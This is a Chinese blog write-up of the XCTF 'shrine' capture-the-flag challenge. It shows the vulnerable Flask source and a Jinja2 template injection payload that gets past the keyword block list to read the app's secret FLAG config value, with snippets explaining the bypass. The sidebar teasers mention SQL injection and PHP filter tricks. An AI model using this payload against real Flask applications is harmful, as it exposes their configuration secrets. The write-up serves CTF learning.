XCTF-Web-高手区-shrine

最新推荐文章于 2022-08-06 18:22:57 发布
最新推荐文章于 2022-08-06 18:22:57 发布
阅读量238 收藏
点赞数
分类专栏: CTF刷题 文章标签: XCTF-Web-高手区
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41617034/article/details/118103190
版权

题目

在这里插入图片描述

解题

1、访问目标,发现有一段代码

在这里插入图片描述
在这里插入图片描述

import flask
import os

app = flask.Flask(__name__)

app.config['FLAG'] = os.environ.pop('FLAG')


@app.route('/')
def index():
    return open(__file__).read()


@app.route('/shrine/<path:shrine>')
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

    return flask.render_template_string(safe_jinja(shrine))


if __name__ == '__main__':
    app.run(debug=True)

2、根据源码该题可能是flask模板注入漏洞

该代码过滤了括号和config、self关键字
对该模板注入了解不多,直接上payload
payload

http://111.200.241.244:64667/shrine/{{ url_for.__globals__['current_app'].config['FLAG']}}

在这里插入图片描述
为什么没有过滤呢?看下面的对比就知道了,为了更好地对比,我将括号转空变为转中括号[]
代码1:

# -*- coding: UTF-8 -*-
s="/shrine/{{ url_for.__globals__['current_app'].config['FLAG']}}"
s = s.replace('(', '[').replace(')', ']')
blacklist = ['config', 'self']
print(''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s)

在这里插入图片描述
代码2:

# -*- coding: UTF-8 -*-
s="/shrine/{{ url_for.__globals__['current_app'].(config)['FLAG']}}"
s = s.replace('(', '[').replace(')', ']')
blacklist = ['config', 'self']
print(''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s)

在这里插入图片描述
由此可见只要出现单括号或双括号,是不会对config进行过滤的

1stPeak
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
[XCTF] web shrine
0of_blog
05-22 224
打开靶场,一眼看,是个flask框架,shrine函数接受了一个shrine参数交给flask的模板渲染器, import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<pat...
XCTF-Web-高手-supersqli
1stPeak's Blog
06-21 700
题目 解题 1、使用常规的SQL注入操作进行注入,我们测试一下单引号 根据返回显示,我们可以判断目标源码中的SQL语句是字符型的,使用单引号闭合 我们本地使用mysql测试如下 2、使用#、--进行测试 发现报错,直接试试编码,将#或--替换为%23或--+ 3、接下来使用order by判断字段数 可以发现,存在两个字段数 4、使用union select判断哪个位置的字段可以进行注入 发现存在过滤,将我的语句过滤了 5、使用堆叠注入 (1)查看所有数据库名 (2)查看所有表名 (3
XCTF-攻防世界CTF平台-Web类——16、shrine(Flask框架之Jinja2模板渲染引擎、查看app.config[‘FLAG‘])
Onlyone_1314的博客
12-11 1570
目录标题python模板注入代码分析:构造Python模板注入url_for()函数查看flagget_flashed_messages()函数查看flag 打开题目地址: 这是Python的flask渲染模板 python模板注入 python模板注入漏洞的产生在于Flask应用框架中render_template_string函数在渲染模板的时候使用了%s来动态的替换字符串,而且Flask模板中使用了Jinja2作为模板渲染引擎,{{}}在Jinja2中作为变量包裹标识符,在渲染的时候将{{}}包裹的内
2020.4.6 xctf(shrine)②
DSR446的博客
04-06 843
首先打开网站,看到网站的源码: import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/&...
XCTF shrine wp
Lakers248_的博客
05-12 261
XCTF shrine wp
XCTF-HW-pipeline附件
最新发布
11-09
附件
XCTF-RE】新手练习-maze
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/fr45py
XCTF-Mobile】新手练习-12.rar
09-01
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5095&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/ctf/hackermind
XCTF-RE】新手练习-logmein
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ez5t60
XCTF-RE】新手练习-insanity
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/siwtcm
XCTF 攻防世界】WEB 高手进阶 shrine(ssti,待补充)
weixin_45844670的博客
09-01 800
关于ssti的详解: (url先空着,正在写) 打开页面就是一段源码,右键查看下源码 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') //注册了一个名为FLAG的config,猜测这就是flag, 如果没有过滤可以直接{{config}}即可查看所有app.config内容, 但是这题设了黑名单[‘config’,‘self’]并且过滤了括号 @app.route
攻防世界XCTFshrine
末初的CSDN博客
03-14 6648
这题涉及到我的知识盲,主要是以下几点: SSTI Flask 框架 Bypass Sandbox 整理得到源码 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return op...
XCTF WEB 高手进阶 baby_web
qq_30076719的博客
11-03 211
这一题让我们想想初始页面是哪一个,第一时间就想到了index.php 于是直接访问,但是却直接跳转回来了1.php 这么说index.php肯定藏了东西,于是点开F12(谷歌浏览器),如下: 很明显,index.php的页面的头部隐藏了一个字段叫FLAG 附上flag: flag{very_baby_web} ...
shrine 攻防世界xctf
weixin_51441054的博客
05-28 172
点击可以看到页面出来的是一段代码 查看源代码如下 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>') def shrine(shrine): .
xctf攻防世界 Web高手进阶 shrine
l8947943的博客
08-06 7620
一般python模板注入涉及到知识比较广,但是套路基本固定,参考大佬的总结文章即可,问题不大。SSTI模板注入总结CTF|有关SSTI的一切小秘密【Flask SSTI+姿势集+Tplmap大杀器】
起名字、三个字母任意组合,一共有17576种组合
热门推荐
可爱的狼
09-23 14万+
$arr = array(); $str = "abcdefghijklmnopqrstuvwxyz"; for ($i =0; $i < strlen($str); $i ++) { for ($j =0; $j < strlen($str); $j ++) { for ($k =0; $k < strlen($str); $k ++) { array_push($arr,$str[$i].$str[$j].$str[$k]); .
攻防世界 web FlatScience
tothemoon的博客
03-04 373
打开网页后每个转跳都点一下发现都是pdf文件除了here 进入了根目录1,然后点here或者these会进入不同的根目录。 这也太难看出其中的奥秘了,用dirsearch跑一下。 经过测试后:发现login.php与admin.php是解题的关键 ...
攻防世界XCTF:ics-05
末初的CSDN博客
03-06 1278
根据提示来到设备维护中心 查看源码可以发现这里隐藏了个超链接变量传参,看到变量传参,有可能存在文件包含漏洞读取源码,然后这个站又是php的站,那么使用php伪协议读取源码: ?page=php://filter/read=convert.base64-encode/resource=index.php 出现了base64编码过的源码,使用base64解码后源码如下: <?php err...
XCTF web高手进阶_1-6
H4ppyD0g的博客
08-08 1036
1 ics-06 去报表中心,发现url后面跟的参数是?id=1,说明id是一个整数型,然后bp抓包,进行爆破id,2333成功。 ———————————— 2 NewsCenter 1' union select 1,2,3 #判断存在sql注入漏洞 (知识点:'是为了闭合前面的单引号,接着让它执行我们自己写的语句,#注释掉后面的后台语句) 1' union select 1,2,databas...
web-ics-05
07-28
- *1* *3* [xctf-web-ics05](https://blog.csdn.net/zhejichensha_l7l/article/details/113530046)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

1stPeak

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值